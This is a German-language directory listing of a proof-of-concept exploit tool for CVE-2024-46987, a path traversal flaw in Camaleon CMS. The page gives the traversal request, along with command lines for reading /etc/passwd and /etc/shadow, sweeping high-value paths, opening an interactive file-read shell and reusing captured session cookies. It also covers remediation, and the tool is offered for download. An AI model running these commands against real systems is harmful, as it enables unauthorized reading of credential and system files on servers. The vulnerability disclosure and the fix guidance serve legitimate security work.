Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46987 — PoC-Exploit für CVE-2024-46987 — Camaleon CMS beliebiger Pfad-Traversal (Dateilesen) | Kitploit
Tools/GitHubGitHub/blueberryp1ll/cve-2024-46987
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubblueberryp1ll/cve-2024-46987

CVE-2024-46987

PoC-Exploit für CVE-2024-46987 — Camaleon CMS beliebiger Pfad-Traversal (Dateilesen)

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-46987 — Camaleon CMS Pfad-Traversal (beliebig)

Nur für autorisierte Sicherheitsbewertungen, Penetrationstests und zu Bildungszwecken.

Übersicht

FeldDetails
CVECVE-2024-46987
ProduktCamaleon CMS
Versionen>= 2.8.0, < 2.8.2 (auch bestätigt auf 2.9.0)
TypPfad-Traversal / Beliebiger Dateizugriff (CWE-22)
AuthentifizierungErforderlich (beliebiges Konto mit niedrigen Berechtigungen)
CVSS7.7 Hoch — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Behoben in2.8.2

Schwachstelle

MediaController#download_private_file übergibt params[:file] unbereinigt an fetch_file:

root@kitploit:~
# Vulnerable sink
fetch_file("private/#{params[:file]}")

Es wird keine Pfadnormalisierung angewendet, bevor der Wert mit send_file verwendet wird, sodass ein authentifizierter Angreifer mit ../-Sequenzen aus dem private/-Verzeichnis ausbrechen und beliebige Dateien lesen kann, auf die der Rails-Prozess Zugriff hat.

Verwundbarer Endpunkt:

root@kitploit:~
GET /admin/media/download_private_file?file=../../../../../../etc/passwd

Voraussetzungen

  • Python 3.8+
  • requests-Bibliothek
root@kitploit:~
pip3 install requests

Verwendung

root@kitploit:~
usage: CVE-2024-46987.py [-h] -u URL (--cookie COOKIE | -U USERNAME)
                         [-P PASSWORD] [-f FILE] [-d DEPTH]
                         [--interesting] [--interactive]
                         [--no-verify] [--debug]

Anmeldung mit Benutzerdaten

root@kitploit:~
# Read /etc/passwd (default)
python3 CVE-2024-46987.py -u http://target.com -U admin -P password

# Read a specific file
python3 CVE-2024-46987.py -u http://target.com -U admin -P password -f /etc/shadow

# Scan a list of high-value paths automatically
python3 CVE-2024-46987.py -u http://target.com -U admin -P password --interesting

# Interactive file-read shell
python3 CVE-2024-46987.py -u http://target.com -U admin -P password --interactive

Wiederverwendung einer bestehenden Sitzung (aus Burp Suite / Browser DevTools)

root@kitploit:~
# Single file
python3 CVE-2024-46987.py -u http://target.com \
  --cookie "_app_session=XXXX" -f /etc/passwd

# Interactive shell
python3 CVE-2024-46987.py -u http://target.com \
  --cookie "_app_session=XXXX; auth_token=YYYY" --interactive

Optionen

FlagBeschreibung
-uZiel-Basis-URL
-U / -PCMS-Benutzername und -Passwort
--cookieRoher Cookie-String (Alternative zu Anmeldedaten)
-fDateipfad zum Lesen (Standard: /etc/passwd)
-dTraversal-Tiefe – Anzahl der vorangestellten ../ (Standard: 10)
--interestingIteriert über integrierte Liste hochwertiger Pfade
--interactiveInteraktive Datei-Lese-Shell
--no-verifyTLS-Zertifikatsprüfung deaktivieren
--debugAusführliche Ausgabe zur Diagnose von Authentifizierungsfehlern

Hinweise zu /proc-Pseudo-Dateien

Dateien unter /proc/self/ (z. B. environ, cmdline) geben HTTP 200 zurück, jedoch mit leerem Inhalt. Dies ist zu erwarten – der Kernel meldet ihre Größe als 0, daher streamt Rails' send_file nichts. Verwenden Sie stattdessen normale Dateien.

Behebung

Aktualisieren Sie Camaleon CMS auf Version 2.8.2 oder höher. Der Patch fügt eine ordnungsgemäße Pfadnormalisierung hinzu und stellt sicher, dass der aufgelöste Pfad vor dem Aufruf von send_file im vorgesehenen Verzeichnis bleibt.

Alternativ:

  • Normalisieren Sie alle benutzereingegebenen Dateipfade vor der Verwendung.
  • Weisen Sie jede Eingabe zurück, die ..-Sequenzen enthält.
  • Wenden Sie das Prinzip der geringsten Privilegien auf den Betriebssystem-Benutzer an, der den Rails-Prozess ausführt.

Referenzen

  • GHSA-cp65-5m9r-vc2c — GitHub-Sicherheitshinweis
  • GHSL-2024-183 — GitHub Security Lab
  • NVD — CVE-2024-46987

Haftungsausschluss

Dieses Proof-of-Concept wird zu Bildungszwecken veröffentlicht und um Sicherheitsexperten dabei zu helfen, die Schwachstelle in autorisierten Testumgebungen zu verstehen und nachzuvollziehen. Der Autor übernimmt keine Verantwortung für Missbrauch. Holen Sie stets eine ausdrückliche schriftliche Genehmigung ein, bevor Sie Systeme testen, die Ihnen nicht gehören.

Tool herunterladen